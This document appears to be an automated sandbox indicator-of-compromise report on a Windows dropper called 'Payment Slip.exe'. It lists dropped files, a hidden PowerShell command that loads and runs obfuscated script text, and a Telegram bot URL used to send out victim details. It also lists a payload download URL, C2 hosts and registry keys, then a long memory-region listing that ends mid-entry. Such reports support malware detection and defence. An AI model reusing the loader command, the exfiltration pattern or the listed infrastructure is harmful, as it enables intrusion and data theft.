IOC Report
Payment Slip.exe

loading gif

Files

File Path
Type
Category
Malicious
Payment Slip.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Masculinity.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Temp\Masculinity.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San
ASCII text, with very long lines (65536), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzkdiry2.t22.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vm21usp2.sdq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Krnemlk.Cig255
data
dropped
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\grensav.sjl
data
dropped
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\lokalplanrammes.sus
data
dropped
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\ondskabsfuldhedernes.txt
ASCII text, with very long lines (367), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\nsw288F.tmp
data
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Payment Slip.exe
"C:\Users\user\Desktop\Payment Slip.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "
malicious
C:\Users\user\AppData\Local\Temp\Masculinity.exe
"C:\Users\user\AppData\Local\Temp\Masculinity.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://www.office.com/
unknown
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
unknown
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
https://duckduckgo.com/ac/?q=
unknown
https://sectigo.com/CPS0
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://api.telegram.org
unknown
https://chrome.google.com/webstore?hl=enlBcq
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://ocsp.sectigo.com0
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://api.telegram.org/bot
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://aka.ms/pscore6lBcq
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://www.reap.skyestates.com.mt/
unknown
http://checkip.dyndns.org
unknown
http://checkip.dyndns.org/8
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://reallyfreegeoip.org/xml/8.46.123.33
188.114.97.3
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20a
unknown
https://chrome.google.com/webstore?hl=en
unknown
https://www.ecosia.org/newtab/
unknown
http://varders.kozow.com:8081
unknown
https://github.com/Pester/Pester
unknown
http://smtp.privateemail.com
unknown
http://aborters.duckdns.org:8081
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://checkip.dyndns.org/
193.122.6.168
http://51.38.247.67:8081/_send_.php?L
unknown
https://reallyfreegeoip.org/xml/8.46.123.33$
unknown
http://anotherarmy.dns.army:8081
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://reallyfreegeoip.org
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://www.reap.skyestates.com.mt/wp-includes/MGGxuAN14.bin
108.167.181.251
https://www.office.com/lBcq
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 36 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.97.3
malicious
api.telegram.org
149.154.167.220
malicious
smtp.privateemail.com
66.29.159.53
malicious
checkip.dyndns.org
unknown
malicious
www.reap.skyestates.com.mt
108.167.181.251
checkip.dyndns.com
193.122.6.168

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
188.114.97.3
reallyfreegeoip.org
European Union
malicious
66.29.159.53
smtp.privateemail.com
United States
malicious
193.122.6.168
checkip.dyndns.com
United States
108.167.181.251
www.reap.skyestates.com.mt
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\fordjelsesbesvret\Uninstall\Spidsfindigeres22
luftrr
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Masculinity_RASMANCS
FileDirectory
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
95F2000
direct allocation
page execute and read and write
malicious
20E61000
trusted library allocation
page read and write
malicious
4E70000
trusted library allocation
page read and write
20E20000
trusted library allocation
page read and write
2374B000
heap
page read and write
80FF000
heap
page read and write
7F40000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
5B0000
heap
page read and write
78B000
heap
page read and write
20B30000
trusted library allocation
page read and write
46A0000
trusted library allocation
page read and write
6875000
heap
page execute and read and write
6FE8000
heap
page read and write
1FE70000
direct allocation
page read and write
4A80000
trusted library allocation
page read and write
4B89000
heap
page read and write
6940000
direct allocation
page read and write
950000
trusted library section
page read and write
20990000
direct allocation
page read and write
6FBE000
heap
page read and write
21EEA000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
22A2000
remote allocation
page execute and read and write
23700000
heap
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
1FE80000
direct allocation
page read and write
4DF0000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
21E65000
trusted library allocation
page read and write
21042000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
21152000
trusted library allocation
page read and write
22F3D000
stack
page read and write
21154000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20C70000
heap
page read and write
4A90000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
20EAE000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
4FE000
stack
page read and write
23561000
heap
page read and write
990000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20C56000
trusted library allocation
page read and write
222DB000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
4A4A000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
9C5000
trusted library allocation
page execute and read and write
4A50000
trusted library allocation
page read and write
2101E000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
4E00000
trusted library allocation
page execute and read and write
B2000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
400000
unkown
page readonly
4A50000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
21ED8000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
90000
trusted library allocation
page read and write
20AF4000
trusted library allocation
page read and write
41F0000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
21044000
trusted library allocation
page read and write
21E81000
trusted library allocation
page read and write
4A5D000
trusted library allocation
page read and write
4EC5000
trusted library allocation
page read and write
4ACE000
heap
page read and write
4A90000
trusted library allocation
page execute and read and write
209EC000
stack
page read and write
6E02000
heap
page read and write
427F000
stack
page read and write
20600000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
2360000
heap
page read and write
A9F2000
direct allocation
page execute and read and write
7220000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
66D0000
direct allocation
page read and write
20B30000
trusted library allocation
page read and write
9AF000
stack
page read and write
9D000
trusted library allocation
page execute and read and write
4AA0000
trusted library allocation
page read and write
587E000
trusted library allocation
page read and write
236DF000
stack
page read and write
4A50000
trusted library allocation
page read and write
994000
trusted library allocation
page read and write
22042000
trusted library allocation
page read and write
22268000
trusted library allocation
page read and write
20C80000
trusted library allocation
page read and write
205CD000
stack
page read and write
20B30000
trusted library allocation
page read and write
21EC4000
trusted library allocation
page read and write
210D7000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
4B25000
heap
page read and write
20B30000
trusted library allocation
page read and write
8068000
heap
page read and write
4A80000
trusted library allocation
page read and write
407000
unkown
page readonly
20B30000
trusted library allocation
page read and write
14C000
stack
page read and write
4A50000
trusted library allocation
page read and write
7CFD000
stack
page read and write
6960000
direct allocation
page read and write
560000
heap
page read and write
4AA0000
trusted library allocation
page read and write
CB000
trusted library allocation
page execute and read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
9FF2000
direct allocation
page execute and read and write
20C88000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4290000
heap
page read and write
448000
unkown
page readonly
23783000
heap
page read and write
7E30000
trusted library allocation
page read and write
20C50000
trusted library allocation
page read and write
6DCE000
stack
page read and write
150000
trusted library allocation
page execute and read and write
21ED2000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
20C50000
trusted library allocation
page read and write
66B0000
direct allocation
page read and write
56D9000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20900000
remote allocation
page read and write
221E0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
7200000
trusted library allocation
page read and write
22CE000
stack
page read and write
21019000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
740000
heap
page read and write
22FA0000
heap
page read and write
4E80000
trusted library allocation
page read and write
407000
unkown
page readonly
40A2000
remote allocation
page execute and read and write
7E0000
heap
page read and write
94000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
7E40000
heap
page read and write
801E000
stack
page read and write
20E20000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
8BF2000
direct allocation
page execute and read and write
4A75000
heap
page read and write
4AA0000
trusted library allocation
page read and write
20F0D000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
7DA5000
trusted library allocation
page read and write
4DA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
5879000
trusted library allocation
page read and write
8080000
heap
page read and write
647000
heap
page read and write
20EBA000
trusted library allocation
page read and write
AAF000
stack
page read and write
4AA0000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
434000
unkown
page read and write
20B30000
trusted library allocation
page read and write
7090000
trusted library allocation
page read and write
C5000
trusted library allocation
page execute and read and write
160000
trusted library allocation
page read and write
21EE7000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20EC8000
trusted library allocation
page read and write
2097F000
stack
page read and write
20B30000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
42B0000
heap
page read and write
221E7000
trusted library allocation
page read and write
22137000
trusted library allocation
page read and write
7D50000
trusted library allocation
page read and write
798000
heap
page read and write
20C50000
trusted library allocation
page read and write
66E0000
direct allocation
page read and write
4DF0000
trusted library allocation
page read and write
20C50000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
426000
unkown
page read and write
20B30000
trusted library allocation
page read and write
21EE5000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
42A000
unkown
page read and write
4A80000
trusted library allocation
page read and write
23CFF000
stack
page read and write
4B43000
heap
page read and write
20F66000
trusted library allocation
page read and write
4D90000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
2216F000
trusted library allocation
page read and write
2369D000
stack
page read and write
4DF0000
trusted library allocation
page read and write
20E20000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
221D3000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
23D3E000
stack
page read and write
4E60000
trusted library allocation
page read and write
21139000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
409000
unkown
page write copy
6D8E000
stack
page read and write
4A50000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4B0A000
heap
page read and write
4A80000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
68E0000
direct allocation
page read and write
20F15000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
401000
unkown
page execute read
620000
heap
page read and write
20E20000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
6EF0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
2215A000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
4A77000
heap
page read and write
23B3E000
stack
page read and write
9A9000
trusted library allocation
page read and write
222F0000
trusted library allocation
page read and write
20E20000
trusted library allocation
page read and write
7250000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
448000
unkown
page readonly
209A0000
direct allocation
page read and write
3770000
trusted library allocation
page read and write
23CBE000
stack
page read and write
56D1000
trusted library allocation
page read and write
20C50000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
21E61000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
A0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
21040000
trusted library allocation
page read and write
204CD000
stack
page read and write
4AA0000
trusted library allocation
page read and write
21F6D000
trusted library allocation
page read and write
6F00000
heap
page execute and read and write
4A50000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
4AAF000
trusted library allocation
page read and write
397000
stack
page read and write
2221C000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
2100B000
trusted library allocation
page read and write
7F30000
trusted library allocation
page read and write
970000
trusted library section
page read and write
4AA0000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
9C0000
trusted library allocation
page read and write
221FE000
trusted library allocation
page read and write
20B40000
heap
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
70EE000
stack
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
421000
unkown
page read and write
21003000
trusted library allocation
page read and write
4AB0000
trusted library allocation
page read and write
4FEA000
trusted library allocation
page read and write
21FB9000
trusted library allocation
page read and write
20E1E000
stack
page read and write
1FE90000
direct allocation
page read and write
805C000
stack
page read and write
4E60000
trusted library allocation
page read and write
5AE000
stack
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
641000
heap
page read and write
20B30000
trusted library allocation
page read and write
72DB000
stack
page read and write
4A80000
trusted library allocation
page read and write
56F9000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
2114E000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4A40000
trusted library allocation
page read and write
228E000
stack
page read and write
20ED0000
trusted library allocation
page read and write
C7000
trusted library allocation
page execute and read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
29DF000
stack
page read and write
1FE30000
direct allocation
page read and write
20B30000
trusted library allocation
page read and write
210CF000
trusted library allocation
page read and write
21ECB000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
22248000
trusted library allocation
page read and write
407000
unkown
page readonly
23F3F000
stack
page read and write
4A80000
trusted library allocation
page read and write
4A30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
8260000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
70A0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
68D0000
direct allocation
page read and write
4AA0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
210E2000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
7D40000
heap
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
210D5000
trusted library allocation
page read and write
4B0000
heap
page read and write
4AA0000
trusted library allocation
page read and write
221F9000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
66C0000
direct allocation
page read and write
670E000
stack
page read and write
22083000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
610000
heap
page read and write
4E60000
trusted library allocation
page read and write
7C70000
heap
page read and write
4E70000
trusted library allocation
page read and write
980000
trusted library allocation
page read and write
22203000
trusted library allocation
page read and write
20F1D000
trusted library allocation
page read and write
409000
unkown
page write copy
20E20000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
23C7F000
stack
page read and write
18A2000
remote allocation
page execute and read and write
4280000
heap
page readonly
20B30000
trusted library allocation
page read and write
6870000
heap
page execute and read and write
201F0000
heap
page read and write
8280000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
810B000
heap
page read and write
4AA0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
46C0000
heap
page execute and read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4825000
trusted library allocation
page read and write
1FE60000
direct allocation
page read and write
9A0000
trusted library allocation
page read and write
7210000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
968000
heap
page read and write
4AA0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4B3B000
heap
page read and write
2114C000
trusted library allocation
page read and write
4A77000
heap
page read and write
4A0000
heap
page read and write
21290000
trusted library allocation
page read and write
2395000
heap
page read and write
4AA0000
trusted library allocation
page read and write
6700000
direct allocation
page read and write
20C50000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
7E14000
trusted library allocation
page read and write
4608000
trusted library allocation
page read and write
20B25000
trusted library allocation
page read and write
20C60000
trusted library allocation
page read and write
23A3F000
stack
page read and write
42B7000
heap
page read and write
20B30000
trusted library allocation
page read and write
4AB0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
21011000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
21146000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
768000
heap
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
B6000
trusted library allocation
page execute and read and write
400000
unkown
page readonly
448000
unkown
page readonly
20B30000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
20FDA000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4EC0000
trusted library allocation
page read and write
82B0000
direct allocation
page execute and read and write
469E000
stack
page read and write
4A80000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20E50000
heap
page execute and read and write
22331000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
2370000
heap
page read and write
4AB0000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
4DB0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
21013000
trusted library allocation
page read and write
62C000
heap
page read and write
4A50000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
6970000
direct allocation
page read and write
4A50000
trusted library allocation
page read and write
4E74000
trusted library allocation
page read and write
6920000
direct allocation
page read and write
22303000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4E5E000
stack
page read and write
4DF0000
trusted library allocation
page read and write
20900000
remote allocation
page read and write
8290000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
221F2000
trusted library allocation
page read and write
22112000
trusted library allocation
page read and write
444000
unkown
page read and write
4AB0000
trusted library allocation
page execute and read and write
4ED0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
811B000
heap
page read and write
20C50000
trusted library allocation
page read and write
20E20000
trusted library allocation
page read and write
7240000
trusted library allocation
page read and write
7D3F000
stack
page read and write
20E20000
trusted library allocation
page read and write
21149000
trusted library allocation
page read and write
4AB0000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
40B000
unkown
page read and write
20C60000
trusted library allocation
page read and write
21E74000
trusted library allocation
page read and write
4B34000
heap
page read and write
98000
stack
page read and write
5EE000
heap
page read and write
6930000
direct allocation
page read and write
2079E000
stack
page read and write
2104A000
trusted library allocation
page read and write
176000
trusted library allocation
page read and write
6900000
direct allocation
page read and write
190000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
4A46000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
2089E000
stack
page read and write
2399000
heap
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
400000
unkown
page readonly
C2000
trusted library allocation
page read and write
1700000
remote allocation
page execute and read and write
7D5D000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
4AC0000
heap
page read and write
20ED8000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
21F5A000
trusted library allocation
page read and write
8270000
trusted library allocation
page execute and read and write
4A80000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4A40000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
82A0000
trusted library allocation
page execute and read and write
20B30000
trusted library allocation
page read and write
80E2000
heap
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
249E000
stack
page read and write
4A80000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
42A0000
trusted library allocation
page execute and read and write
20F05000
trusted library allocation
page read and write
8145000
heap
page read and write
20B30000
trusted library allocation
page read and write
210DE000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
6910000
direct allocation
page read and write
20B30000
trusted library allocation
page read and write
8060000
heap
page read and write
2074F000
stack
page read and write
2038E000
stack
page read and write
4A80000
trusted library allocation
page read and write
20F01000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
6F30000
heap
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
99D000
trusted library allocation
page execute and read and write
4A80000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
993000
trusted library allocation
page execute and read and write
4B43000
heap
page read and write
2064E000
stack
page read and write
4A80000
trusted library allocation
page read and write
35C000
stack
page read and write
4DE0000
trusted library allocation
page execute and read and write
21EDC000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
4ACA000
heap
page read and write
4AB0000
trusted library allocation
page read and write
2300000
heap
page read and write
2232D000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
2390000
heap
page read and write
4E60000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
20E20000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
7E2000
heap
page read and write
628000
heap
page read and write
4EE0000
trusted library allocation
page read and write
684F000
stack
page read and write
20B30000
trusted library allocation
page read and write
20EC5000
trusted library allocation
page read and write
1FE40000
direct allocation
page read and write
4AA0000
trusted library allocation
page read and write
21EF0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
2034F000
stack
page read and write
2100F000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4DA0000
trusted library allocation
page read and write
423E000
stack
page read and write
20B30000
trusted library allocation
page read and write
21E7B000
trusted library allocation
page read and write
20AE7000
stack
page read and write
20B30000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
220B4000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
448000
unkown
page readonly
23E3F000
stack
page read and write
20B30000
trusted library allocation
page read and write
472F000
trusted library allocation
page read and write
10E000
stack
page read and write
4AA0000
trusted library allocation
page read and write
20F11000
trusted library allocation
page read and write
6F59000
heap
page read and write
4A50000
trusted library allocation
page read and write
2048F000
stack
page read and write
4AA0000
trusted library allocation
page read and write
20C50000
trusted library allocation
page read and write
4A50000
trusted library allocation
page read and write
23B7E000
stack
page read and write
20B30000
trusted library allocation
page read and write
4A40000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
5E0000
heap
page read and write
674F000
stack
page read and write
20C50000
trusted library allocation
page read and write
409000
unkown
page read and write
4FEC000
trusted library allocation
page read and write
7C67000
stack
page read and write
960000
heap
page read and write
4E80000
trusted library allocation
page execute and read and write
20E20000
trusted library allocation
page read and write
680E000
stack
page read and write
67CF000
stack
page read and write
4AA0000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
53E000
stack
page read and write
565000
heap
page read and write
573A000
trusted library allocation
page read and write
20E20000
trusted library allocation
page read and write
5EA000
heap
page read and write
4A50000
trusted library allocation
page read and write
760000
heap
page read and write
4AA0000
trusted library allocation
page read and write
2024E000
stack
page read and write
4AA0000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
71C0000
trusted library allocation
page execute and read and write
20B30000
trusted library allocation
page read and write
20E20000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
71E0000
trusted library allocation
page read and write
B3F2000
direct allocation
page execute and read and write
6950000
direct allocation
page read and write
678E000
stack
page read and write
4DF0000
trusted library allocation
page read and write
7270000
trusted library allocation
page read and write
2594000
heap
page read and write
4A50000
trusted library allocation
page read and write
20E20000
trusted library allocation
page read and write
7D60000
trusted library allocation
page execute and read and write
66F0000
heap
page read and write
19A000
stack
page read and write
20F43000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
20E20000
trusted library allocation
page read and write
21FCF000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
6AD0000
heap
page read and write
7030000
trusted library allocation
page read and write
42E000
unkown
page read and write
23560000
heap
page read and write
20B31000
trusted library allocation
page read and write
20B30000
trusted library allocation
page read and write
21E89000
